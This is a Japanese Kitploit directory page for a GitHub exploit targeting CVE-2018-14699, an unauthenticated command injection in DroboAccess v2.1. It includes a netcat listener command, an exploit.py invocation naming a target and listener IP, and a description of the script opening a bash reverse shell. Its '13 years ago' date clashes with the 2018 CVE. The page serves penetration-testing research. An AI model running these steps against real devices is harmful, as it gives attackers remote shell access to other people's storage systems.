Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-14699 — DroboAccess v 2.1 の enable_user 関数における、認証不要のブラインドコマンドインジェクション | Kitploit
ツール/GitHubGitHub/revocain/cve-2018-14699
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubrevocain/cve-2018-14699

CVE-2018-14699

DroboAccess v 2.1 の enable_user 関数における、認証不要のブラインドコマンドインジェクション

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-14699

DroboAccess v2.1 の enable_user 関数における未認証のコマンドインジェクション


使用方法:

  • 使用するには、まずリスナーを起動します (ncat -nvlp 1337)

  • 次にエクスプロイトを実行します

    • 例: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337

    '-t', '--target', help='エクスプロイト対象のホスト、例: 192.168.1.122:8080',required=True

    '-l', '--listener-ip', help='リスナーIP', required=True

    '-p', '--port', help='リスナーのポート番号', required=True

説明:

CVE-2018-14699 は DroboAccess v2.1 におけるブラインドコマンドインジェクションの脆弱性です。問題は、enable_user 関数がユーザー名パラメータをユーザー入力として受け取り、その後サニタイズなしでシェルを直接実行する依存関係を呼び出すことにあります。これを明確にしますが、これに関する他の参照はどこにもないようです。繰り返しますが、これは Drobo 5N2 の脆弱性ではなく、DroboAccess の脆弱性です。これは B810n でテストされ成功しています。

詳細

スクリプトは、現在の作業ディレクトリに revshell というファイルにスクリプトをエコー書き込みしようと試みます。成功した場合、bash を実行ファイルとして呼び出し、リスナーに bash で接続を返そうと試みます。

リソース:

  • https://blog.securityevaluators.com/call-me-a-doctor-new-vulnerabilities-in-drobo5n2-4f1d885df7fc
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14699
ツールをダウンロード